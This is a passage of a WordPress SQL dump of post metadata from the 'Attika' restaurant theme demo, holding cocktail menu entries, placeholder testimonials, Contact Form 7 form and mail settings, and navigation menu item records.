flavors.'),(28128,1358,'slide_template','default'),(28129,1360,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(28130,1360,'restaurant_menu_item_price','7$'),(28131,1360,'restaurant_menu_item_description','The traditional cuban cocktail combination. Refreshing lime and mint leaves. Made with Cruzan Light Rum.'),(28132,1360,'slide_template','default'),(28133,1361,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(28134,1361,'restaurant_menu_item_price','8$'),(28135,1361,'restaurant_menu_item_description','Smirnoff Vodka, Sauza Blue Tequila, Myer\'s Platinum, Gin, Blue Curocoo, Sour Mix and Sierra Mist'),(28136,1361,'slide_template','default'),(28137,1362,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(28138,1362,'restaurant_menu_item_price','7$'),(28139,1362,'restaurant_menu_item_description','Made with Sauza Blue Tequila, watermelon and margarita mix. Topped with fresh watermelon and limes.'),(28140,1362,'slide_template','default'),(28141,1363,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(28142,1363,'restaurant_menu_item_price','5$'),(28143,1363,'restaurant_menu_item_description','Cruzan Rum, Fresh Mint and Sierra Mist.'),(28144,1363,'slide_template','default'),(28145,2904,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(28146,2904,'mkdf_testimonial_text','\" Lorem ipsum dolor sit amet, consectetur adipiscing elit. Vivamus diam est, pellentesque eu fermentum a, lobortis tincidunt tellus. Vivamus in dolor tincidunt sapien placerat consectetur. Curabitur ligula lacus, venenatis non dolor vel, semper egestas purus. In condimentum lacinia sem, sit amet dignissim ligula fermentum in. In euismod justo felis, in gravida nibh rutrum id. Maecenas in metus ac neque. \"'),(28147,2904,'mkdf_testimonial_author','anthony johnston'),(28148,2904,'mkdf_testimonial_author_position','guest'),(28149,2904,'slide_template','default'),(28150,2906,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(28151,2906,'mkdf_testimonial_text','\" Lorem ipsum dolor sit amet, consectetur adipiscing elit. Vivamus diam est, pellentesque eu fermentum a, lobortis tincidunt tellus. Vivamus in dolor tincidunt sapien placerat consectetur. Curabitur ligula lacus, venenatis non dolor vel, semper egestas purus. In condimentum lacinia sem, sit amet dignissim ligula fermentum in. In euismod justo felis, in gravida nibh rutrum id. Maecenas in metus ac neque. \"'),(28152,2906,'mkdf_testimonial_author','anthony johnston'),(28153,2906,'mkdf_testimonial_author_position','guest'),(28154,2906,'slide_template','default'),(28155,3154,'_form','<label> Your Name (required)\n    [text* your-name] </label>\n\n<label> Your Email (required)\n    [email* your-email] </label>\n\n<label> Subject\n    [text your-subject] </label>\n\n<label> Your Message\n    [textarea your-message] </label>\n\n[submit \"Send\"]'),(28156,3154,'_mail','a:8:{s:7:\"subject\";s:23:\"Attika \"[your-subject]\"\";s:6:\"sender\";s:48:\"[your-name] <wordpress@attika.mikado-themes.com>\";s:4:\"body\";s:176:\"From: [your-name] <[your-email]>\nSubject: [your-subject]\n\nMessage Body:\n[your-message]\n\n-- \nThis e-mail was sent from a contact form on Attika (http://attika.mikado-themes.com)\";s:9:\"recipient\";s:25:\"support@mikado-themes.com\";s:18:\"additional_headers\";s:22:\"Reply-To: [your-email]\";s:11:\"attachments\";s:0:\"\";s:8:\"use_html\";i:0;s:13:\"exclude_blank\";i:0;}'),(28157,3154,'_mail_2','a:9:{s:6:\"active\";b:0;s:7:\"subject\";s:23:\"Attika \"[your-subject]\"\";s:6:\"sender\";s:43:\"Attika <wordpress@attika.mikado-themes.com>\";s:4:\"body\";s:118:\"Message Body:\n[your-message]\n\n-- \nThis e-mail was sent from a contact form on Attika (http://attika.mikado-themes.com)\";s:9:\"recipient\";s:12:\"[your-email]\";s:18:\"additional_headers\";s:35:\"Reply-To: support@mikado-themes.com\";s:11:\"attachments\";s:0:\"\";s:8:\"use_html\";i:0;s:13:\"exclude_blank\";i:0;}'),(28158,3154,'_messages','a:8:{s:12:\"mail_sent_ok\";s:45:\"Thank you for your message. It has been sent.\";s:12:\"mail_sent_ng\";s:71:\"There was an error trying to send your message. Please try again later.\";s:16:\"validation_error\";s:61:\"One or more fields have an error. Please check and try again.\";s:4:\"spam\";s:71:\"There was an error trying to send your message. Please try again later.\";s:12:\"accept_terms\";s:69:\"You must accept the terms and conditions before sending your message.\";s:16:\"invalid_required\";s:22:\"The field is required.\";s:16:\"invalid_too_long\";s:22:\"The field is too long.\";s:17:\"invalid_too_short\";s:23:\"The field is too short.\";}'),(28159,3154,'_additional_settings',''),(28160,3154,'_locale','en_US'),(28161,3155,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(28162,3155,'_form','<div class=\"mkdf-cf7-rf\">\n<label> Event name:[text* event-name]</label><div class=\"mkdf-cf7-rf-date\">\n<label> Event date:[date* your-date min:2018-08-01 max:2050-12-31 class:required \"2018-08-01\"]</label><label> Start time:[time* time-938 time-format:HH:mm min-hour:00-00 max-hour:24*00 step-hour:1]</label><label> End time:[time* time-624 time-format:HH:mm] </label>\n</div>\n[checkbox checkbox-201 \"I/We have flexible date\"]\n<div class=\"mkdf-cf7-rf-guests\">\n<label> Guests:[text* guests] </label><label> Budget:[text* budget]</label><p>[radio radio-653 class:guests label_first default:1 \"Total\" \"Per person\" ]</p>\n</div>\n<label> Contact name:[text* contact-name] </label>\n<div class=\"mkdf-cf7-rf-2-col\">\n<label> Company (optional):[text company-name] </label><label>Industry (optional):[text industry-name]</label>\n</div>\n<div class=\"mkdf-cf7-rf-2-col\">\n<label> Email:[email* your-email] </label><label>Phone:[text* phone-number]</label>\n</div>\n<div class=\"mkdf-cf7-rf-msg\">\n<label> Tell us more about event (optional):\n[textarea your-message] </label>\n</div>\n<div class=\"mkdf-cf7-rf-btn\">\n<div class=\"mkdf-cf7-rf-btn-inner\">\n[submit \"Send Reservation\"]\n</div>\n</div>\n</div>'),(28163,3155,'_mail','a:9:{s:6:\"active\";b:1;s:7:\"subject\";s:23:\"Attika \"[your-subject]\"\";s:6:\"sender\";s:48:\"[your-name] <wordpress@attika.mikado-themes.com>\";s:9:\"recipient\";s:25:\"support@mikado-themes.com\";s:4:\"body\";s:176:\"From: [your-name] <[your-email]>\nSubject: [your-subject]\n\nMessage Body:\n[your-message]\n\n-- \nThis e-mail was sent from a contact form on Attika (http://attika.mikado-themes.com)\";s:18:\"additional_headers\";s:22:\"Reply-To: [your-email]\";s:11:\"attachments\";s:0:\"\";s:8:\"use_html\";b:0;s:13:\"exclude_blank\";b:0;}'),(28164,3155,'_mail_2','a:9:{s:6:\"active\";b:0;s:7:\"subject\";s:23:\"Attika \"[your-subject]\"\";s:6:\"sender\";s:43:\"Attika <wordpress@attika.mikado-themes.com>\";s:9:\"recipient\";s:12:\"[your-email]\";s:4:\"body\";s:118:\"Message Body:\n[your-message]\n\n-- \nThis e-mail was sent from a contact form on Attika (http://attika.mikado-themes.com)\";s:18:\"additional_headers\";s:35:\"Reply-To: support@mikado-themes.com\";s:11:\"attachments\";s:0:\"\";s:8:\"use_html\";b:0;s:13:\"exclude_blank\";b:0;}'),(28165,3155,'_messages','a:23:{s:12:\"mail_sent_ok\";s:45:\"Thank you for your message. It has been sent.\";s:12:\"mail_sent_ng\";s:71:\"There was an error trying to send your message. Please try again later.\";s:16:\"validation_error\";s:61:\"One or more fields have an error. Please check and try again.\";s:4:\"spam\";s:71:\"There was an error trying to send your message. Please try again later.\";s:12:\"accept_terms\";s:69:\"You must accept the terms and conditions before sending your message.\";s:16:\"invalid_required\";s:22:\"The field is required.\";s:16:\"invalid_too_long\";s:22:\"The field is too long.\";s:17:\"invalid_too_short\";s:23:\"The field is too short.\";s:13:\"upload_failed\";s:46:\"There was an unknown error uploading the file.\";s:24:\"upload_file_type_invalid\";s:49:\"You are not allowed to upload files of this type.\";s:21:\"upload_file_too_large\";s:20:\"The file is too big.\";s:23:\"upload_failed_php_error\";s:38:\"There was an error uploading the file.\";s:14:\"invalid_number\";s:29:\"The number format is invalid.\";s:16:\"number_too_small\";s:47:\"The number is smaller than the minimum allowed.\";s:16:\"number_too_large\";s:46:\"The number is larger than the maximum allowed.\";s:23:\"quiz_answer_not_correct\";s:36:\"The answer to the quiz is incorrect.\";s:17:\"captcha_not_match\";s:31:\"Your entered code is incorrect.\";s:13:\"invalid_email\";s:38:\"The e-mail address entered is invalid.\";s:11:\"invalid_url\";s:19:\"The URL is invalid.\";s:11:\"invalid_tel\";s:32:\"The telephone number is invalid.\";s:16:\"invalid_datetime\";s:31:\"Invalid date and time supplied.\";s:12:\"invalid_date\";s:29:\"The date format is incorrect.\";s:12:\"invalid_time\";s:22:\"Invalid time supplied.\";}'),(28166,3155,'_additional_settings',''),(28167,3155,'_locale','en_US'),(28168,2905,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(28169,2905,'mkdf_testimonial_text','\" Lorem ipsum dolor sit amet, consectetur adipiscing elit. Vivamus diam est, pellentesque eu fermentum a, lobortis tincidunt tellus. Vivamus in dolor tincidunt sapien placerat consectetur. Curabitur ligula lacus, venenatis non dolor vel, semper egestas purus. In condimentum lacinia sem, sit amet dignissim ligula fermentum in. In euismod justo felis, in gravida nibh rutrum id. Maecenas in metus ac neque. \"'),(28170,2905,'mkdf_testimonial_author','Isabella Lee'),(28171,2905,'mkdf_testimonial_author_position','guest'),(28172,2905,'slide_template','default'),(28173,3156,'_menu_item_type','post_type'),(28174,3156,'_menu_item_menu_item_parent','2987'),(28175,3156,'_menu_item_object_id','3040'),(28176,3156,'_menu_item_object','page'),(28177,3156,'_menu_item_target',''),(28178,3156,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(28179,3156,'_menu_item_xfn',''),(28180,3156,'_menu_item_url',''),(28181,3156,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(28182,3156,'_menu_item_icon','null'),(28183,3157,'_menu_item_type','post_type'),(28184,3157,'_menu_item_menu_item_parent','2990'),(28185,3157,'_menu_item_object_id','3034'),(28186,3157,'_menu_item_object','page'),(28187,3157,'_menu_item_target',''),(28188,3157,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(28189,3157,'_menu_item_xfn',''),(28190,3157,'_menu_item_url',''),(28191,3157,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(28192,3157,'_menu_item_icon','null'),(28193,3158,'_menu_item_type','post_type'),(28194,3158,'_menu_item_menu_item_parent','3011'),(28195,3158,'_menu_item_object_id','3035'),(28196,3158,'_menu_item_object','page'),(28197,3158,'_menu_item_target',''),(28198,3158,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(28199,3158,'_menu_item_xfn',''),(28200,3158,'_menu_item_url',''),(28201,3158,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(28202,3158,'_menu_item_icon','null'),(28203,3159,'_menu_item_type','post_type'),(28204,3159,'_menu_item_menu_item_parent','3011'),(28205,3159,'_menu_item_object_id','3037'),(28206,3159,'_menu_item_object','page'),(28207,3159,'_menu_item_target',''),(28208,3159,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(28209,3159,'_menu_item_xfn',''),(28210,3159,'_menu_item_url',''),(28211,3159,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(28212,3159,'_menu_item_icon','null'),(28213,3160,'_menu_item_type','post_type'),(28214,3160,'_menu_item_menu_item_parent','3011'),(28215,3160,'_menu_item_object_id','3036'),(28216,3160,'_menu_item_object','page'),(28217,3160,'_menu_item_target',''),(28218,3160,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(28219,3160,'_menu_item_xfn',''),(28220,3160,'_menu_item_url',''),(28221,3160,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(28222,3160,'_menu_item_icon','null'),(28223,3161,'_menu_item_type','post_type'),(28224,3161,'_menu_item_menu_item_parent','3020'),(28225,3161,'_menu_item_object_id','3038'),(28226,3161,'_menu_item_object','page'),(28227,3161,'_menu_item_target',''),(28228,3161,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(28229,3161,'_menu_item_xfn',''),(28230,3161,'_menu_item_url',''),(28231,3161,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(28232,3161,'_menu_item_icon','null'),(28233,3162,'_menu_item_type','post_type'),(28234,3162,'_menu_item_menu_item_parent','3024'),(28235,3162,'_menu_item_object_id','3038'),(28236,3162,'_menu_item_object','page'),(28237,3162,'_menu_item_target',''),(28238,3162,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(28239,3162,'_menu_item_xfn',''),(28240,3162,'_menu_item_url',''),(28241,3162,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(28242,3162,'_menu_item_icon','null'),(28243,3163,'_menu_item_type','post_type'),(28244,3163,'_menu_item_menu_item_parent','2997'),(28245,3163,'_menu_item_object_id','3034'),(28246,3163,'_menu_item_object','page'),(28247,3163,'_menu_item_target',''),(28248,3163,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(28249,3163,'_menu_item_xfn',''),(28250,3163,'_menu_item_url',''),(28251,3163,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(28252,3163,'_menu_item_icon','null'),(28253,3164,'_menu_item_type','post_type'),(28254,3164,'_menu_item_menu_item_parent','3014'),(28255,3164,'_menu_item_object_id','3037'),(28256,3164,'_menu_item_object','page'),(28257,3164,'_menu_item_target',''),(28258,3164,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(28259,3164,'_menu_item_xfn',''),(28260,3164,'_menu_item_url',''),(28261,3164,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(28262,3164,'_menu_item_icon','null'),(28263,3165,'_menu_item_type','post_type'),(28264,3165,'_menu_item_menu_item_parent','3014'),(28265,3165,'_menu_item_object_id','3036'),(28266,3165,'_menu_item_object','page'),(28267,3165,'_menu_item_target',''),(28268,3165,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(28269,3165,'_menu_item_xfn',''),(28270,3165,'_menu_item_url',''),(28271,3165,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(28272,3165,'_menu_item_icon','null'),(28273,3166,'_menu_item_type','post_type'),(28274,3166,'_menu_item_menu_item_parent','3014'),(28275,3166,'_menu_item_object_id','3035'),(28276,3166,'_menu_item_object','page'),(28277,3166,'_menu_item_target',''),(28278,3166,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(28279,3166,'_menu_item_xfn',''),(28280,3166,'_menu_item_url',''),(28281,3166,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(28282,3166,'_menu_item_icon','null'),(28283,3167,'_menu_item_type','post_type'),(28284,3167,'_menu_item_menu_item_parent','3002'),(28285,3167,'_menu_item_object_id','3034'),(28286,3167,'_menu_item_object','page'),(28287,3167,'_menu_item_target',''),(28288,3167,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(28289,3167,'_menu_item_xfn',''),(28290,3167,'_menu_item_url',''),(28291,3167,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(28292,3168,'_menu_item_type','post_type'),(28293,3168,'_menu_item_menu_item_parent','3007'),(28294,3168,'_menu_item_object_id','3034'),(28295,3168,'_menu_item_object','page'),(28296,3168,'_menu_item_target',''),(28297,3168,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(28298,3168,'_menu_item_xfn',''),(28299,3168,'_menu_item_url',''),(28300,3168,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(28301,3169,'_menu_item_type','post_type'),(28302,3169,'_menu_item_menu_item_parent','2987'),(28303,3169,'_menu_item_object_id','3042'),(28304,3169,'_menu_item_object','page'),(28305,3169,'_menu_item_target',''),(28306,3169,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(28307,3169,'_menu_item_xfn',''),(28308,3169,'_menu_item_url',''),(28309,3169,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(28310,3169,'_menu_item_icon','null'),(28311,3170,'_menu_item_type','post_type'),(28312,3170,'_menu_item_menu_item_parent','2987'),(28313,3170,'_menu_item_object_id','3041'),(28314,3170,'_menu_item_object','page'),(28315,3170,'_menu_item_target',''),(28316,3170,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(28317,3170,'_menu_item_xfn',''),(28318,3170,'_menu_item_url',''),(28319,3170,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(28320,3170,'_menu_item_icon','null'),(28321,3171,'_menu_item_type','post_type'),(28322,3171,'_menu_item_menu_item_parent','2994'),(28323,3171,'_menu_item_object_id','3042'),(28324,3171,'_menu_item_object','page'),(28325,3171,'_menu_item_target',''),(28326,3171,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(28327,3171,'_menu_item_xfn',''),(28328,3171,'_menu_item_url',''),(28329,3171,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(28330,3171,'_menu_item_icon','null'),(28331,3172,'_menu_item_type','post_type'),(28332,3172,'_menu_item_menu_item_parent','2994'),(28333,3172,'_menu_item_object_id','3041'),(28334,3172,'_menu_item_object','page'),(28335,3172,'_menu_item_target',''),(28336,3172,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(28337,3172,'_menu_item_xfn',''),(28338,3172,'_menu_item_url',''),(28339,3172,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(28340,3172,'_menu_item_icon','null'),(28341,3173,'_menu_item_type','post_type'),(28342,3173,'_menu_item_menu_item_parent','3014'),(28343,3173,'_menu_item_object_id','3044'),(28344,3173,'_menu_item_object','page'),(28345,3173,'_menu_item_target',''),(28346,3173,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(28347,3173,'_menu_item_xfn',''),(28348,3173,'_menu_item_url',''),(28349,3173,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(28350,3173,'_menu_item_icon','null'),(28351,3174,'_menu_item_type','post_type'),(28352,3174,'_menu_item_menu_item_parent','3007'),(28353,3174,'_menu_item_object_id','3044'),(28354,3174,'_menu_item_object','page'),(28355,3174,'_menu_item_target',''),(28356,3174,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(28357,3174,'_menu_item_xfn',''),(28358,3174,'_menu_item_url',''),(28359,3174,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(28360,3175,'_menu_item_type','post_type'),(28361,3175,'_menu_item_menu_item_parent','3011'),(28362,3175,'_menu_item_object_id','3044'),(28363,3175,'_menu_item_object','page'),(28364,3175,'_menu_item_target',''),(28365,3175,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(28366,3175,'_menu_item_xfn',''),(28367,3175,'_menu_item_url',''),(28368,3175,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(28369,3175,'_menu_item_icon','null'),(28370,3176,'_menu_item_type','post_type'),(28371,3176,'_menu_item_menu_item_parent','2988'),(28372,3176,'_menu_item_object_id','3043'),(28373,3176,'_menu_item_object','page'),(28374,3176,'_menu_item_target',''),(28375,3176,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(28376,3176,'_menu_item_xfn',''),(28377,3176,'_menu_item_url',''),(28378,3176,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(28379,3176,'_menu_item_icon','null'),(28380,3177,'_menu_item_type','post_type'),(28381,3177,'_menu_item_menu_item_parent','2995'),(28382,3177,'_menu_item_object_id','3043'),(28383,3177,'_menu_item_object','page'),(28384,3177,'_menu_item_target',''),(28385,3177,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(28386,3177,'_menu_item_xfn',''),(28387,3177,'_menu_item_url',''),(28388,3177,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(28389,3177,'_menu_item_icon','null'),(28390,3178,'_menu_item_type','post_type'),(28391,3178,'_menu_item_menu_item_parent','3013'),(28392,3178,'_menu_item_object_id','3047'),(28393,3178,'_menu_item_object','page'),(28394,3178,'_menu_item_target',''),(28395,3178,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(28396,3178,'_menu_item_xfn',''),(28397,3178,'_menu_item_url',''),(28398,3178,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(28399,3178,'_menu_item_icon','null'),(28400,3179,'_menu_item_type','post_type'),(28401,3179,'_menu_item_menu_item_parent','3013'),(28402,3179,'_menu_item_object_id','3046'),(28403,3179,'_menu_item_object','page'),(28404,3179,'_menu_item_target',''),(28405,3179,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(28406,3179,'_menu_item_xfn',''),(28407,3179,'_menu_item_url',''),(28408,3179,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(28409,3179,'_menu_item_icon','null'),(28410,3180,'_menu_item_type','post_type'),(28411,3180,'_menu_item_menu_item_parent','3013'),(28412,3180,'_menu_item_object_id','3045'),(28413,3180,'_menu_item_object','page'),(28414,3180,'_menu_item_target',''),(28415,3180,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(28416,3180,'_menu_item_xfn',''),(28417,3180,'_menu_item_url',''),(28418,3180,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(28419,3180,'_menu_item_icon','null'),(28420,3181,'_menu_item_type','post_type'),(28421,3181,'_menu_item_menu_item_parent','3007'),(28422,3181,'_menu_item_object_id','3045'),(28423,3181,'_menu_item_object','page'),(28424,3181,'_menu_item_target',''),(28425,3181,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(28426,3181,'_menu_item_xfn',''),(28427,3181,'_menu_item_url',''),(28428,3181,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(28429,3182,'_menu_item_type','post_type'),(28430,3182,'_menu_item_menu_item_parent','3010'),(28431,3182,'_menu_item_object_id','3047'),(28432,3182,'_menu_item_object','page'),(28433,3182,'_menu_item_target',''),(28434,3182,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(28435,3182,'_menu_item_xfn',''),(28436,3182,'_menu_item_url',''),(28437,3182,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(28438,3182,'_menu_item_icon','null'),(28439,3183,'_menu_item_type','post_type'),(28440,3183,'_menu_item_menu_item_parent','3010'),(28441,3183,'_menu_item_object_id','3046'),(28442,3183,'_menu_item_object','page'),(28443,3183,'_menu_item_target',''),(28444,3183,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(28445,3183,'_menu_item_xfn',''),(28446,3183,'_menu_item_url',''),(28447,3183,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(28448,3183,'_menu_item_icon','null'),(28449,3184,'_menu_item_type','post_type'),(28450,3184,'_menu_item_menu_item_parent','3010'),(28451,3184,'_menu_item_object_id','3045'),(28452,3184,'_menu_item_object','page'),(28453,3184,'_menu_item_target',''),(28454,3184,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(28455,3184,'_menu_item_xfn',''),(28456,3184,'_menu_item_url',''),(28457,3184,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(28458,3184,'_menu_item_icon','null'),(28459,3185,'_menu_item_type','post_type'),(28460,3185,'_menu_item_menu_item_parent','2995'),(28461,3185,'_menu_item_object_id','3048'),(28462,3185,'_menu_item_object','page'),(28463,3185,'_menu_item_target',''),(28464,3185,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(28465,3185,'_menu_item_xfn',''),(28466,3185,'_menu_item_url',''),(28467,3185,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(28468,3185,'_menu_item_icon','null'),(28469,3186,'_menu_item_type','post_type'),(28470,3186,'_menu_item_menu_item_parent','2995'),(28471,3186,'_menu_item_object_id','3051'),(28472,3186,'_menu_item_object','page'),(28473,3186,'_menu_item_target',''),(28474,3186,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(28475,3186,'_menu_item_xfn',''),(28476,3186,'_menu_item_url',''),(28477,3186,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(28478,3186,'_menu_item_icon','null'),(28479,3187,'_menu_item_type','post_type'),(28480,3187,'_menu_item_menu_item_parent','2995'),(28481,3187,'_menu_item_object_id','3050'),(28482,3187,'_menu_item_object','page'),(28483,3187,'_menu_item_target',''),(28484,3187,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(28485,3187,'_menu_item_xfn',''),(28486,3187,'_menu_item_url',''),(28487,3187,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(28488,3187,'_menu_item_icon','null'),(28489,3188,'_menu_item_type','post_type'),(28490,3188,'_menu_item_menu_item_parent','2995'),(28491,3188,'_menu_item_object_id','3049'),(28492,3188,'_menu_item_object','page'),(28493,3188,'_menu_item_target',''),(28494,3188,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(28495,3188,'_menu_item_xfn',''),(28496,3188,'_menu_item_url',''),(28497,3188,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(28498,3188,'_menu_item_icon','null'),(28499,3189,'_menu_item_type','post_type'),(28500,3189,'_menu_item_menu_item_parent','2994'),(28501,3189,'_menu_item_object_id','3040'),(28502,3189,'_menu_item_object','page'),(28503,3189,'_menu_item_target',''),(28504,3189,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(28505,3189,'_menu_item_xfn',''),(28506,3189,'_menu_item_url',''),(28507,3189,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(28508,3189,'_menu_item_icon','null'),(28509,3190,'_menu_item_type','post_type'),(28510,3190,'_menu_item_menu_item_parent','3005'),(28511,3190,'_menu_item_object_id','3042'),(28512,3190,'_menu_item_object','page'),(28513,3190,'_menu_item_target',''),(28514,3190,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(28515,3190,'_menu_item_xfn',''),(28516,3190,'_menu_item_url',''),(28517,3190,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(28518,3191,'_menu_item_type','post_type'),(28519,3191,'_menu_item_menu_item_parent','3005'),(28520,3191,'_menu_item_object_id','3040'),(28521,3191,'_menu_item_object','page'),(28522,3191,'_menu_item_target',''),(28523,3191,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(28524,3191,'_menu_item_xfn',''),(28525,3191,'_menu_item_url',''),(28526,3191,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(28527,3192,'_menu_item_type','post_type'),(28528,3192,'_menu_item_menu_item_parent','3000'),(28529,3192,'_menu_item_object_id','3040'),(28530,3192,'_menu_item_object','page'),(28531,3192,'_menu_item_target',''),(28532,3192,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(28533,3192,'_menu_item_xfn',''),(28534,3192,'_menu_item_url',''),(28535,3192,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(28536,3193,'_menu_item_type','post_type'),(28537,3193,'_menu_item_menu_item_parent','2995'),(28538,3193,'_menu_item_object_id','3052'),(28539,3193,'_menu_item_object','page'),(28540,3193,'_menu_item_target',''),(28541,3193,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(28542,3193,'_menu_item_xfn',''),(28543,3193,'_menu_item_url',''),(28544,3193,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(28545,3193,'_menu_item_icon','null'),(28546,3194,'_menu_item_type','post_type'),(28547,3194,'_menu_item_menu_item_parent','2987'),(28548,3194,'_menu_item_object_id','3053'),(28549,3194,'_menu_item_object','page'),(28550,3194,'_menu_item_target',''),(28551,3194,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(28552,3194,'_menu_item_xfn',''),(28553,3194,'_menu_item_url',''),(28554,3194,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(28555,3194,'_menu_item_icon','null'),(28556,3195,'_menu_item_type','post_type'),(28557,3195,'_menu_item_menu_item_parent','2994'),(28558,3195,'_menu_item_object_id','3053'),(28559,3195,'_menu_item_object','page'),(28560,3195,'_menu_item_target',''),(28561,3195,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(28562,3195,'_menu_item_xfn',''),(28563,3195,'_menu_item_url',''),(28564,3195,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(28565,3195,'_menu_item_icon','null'),(28566,3196,'_menu_item_type','post_type'),(28567,3196,'_menu_item_menu_item_parent','3005'),(28568,3196,'_menu_item_object_id','3053'),(28569,3196,'_menu_item_object','page'),(28570,3196,'_menu_item_target',''),(28571,3196,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(28572,3196,'_menu_item_xfn',''),(28573,3196,'_menu_item_url',''),(28574,3196,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(28575,3197,'_menu_item_type','post_type'),(28576,3197,'_menu_item_menu_item_parent','2987'),(28577,3197,'_menu_item_object_id','3055'),(28578,3197,'_menu_item_object','page'),(28579,3197,'_menu_item_target',''),(28580,3197,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(28581,3197,'_menu_item_xfn',''),(28582,3197,'_menu_item_url',''),(28583,3197,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(28584,3197,'_menu_item_icon','null'),(28585,3198,'_menu_item_type','post_type'),(28586,3198,'_menu_item_men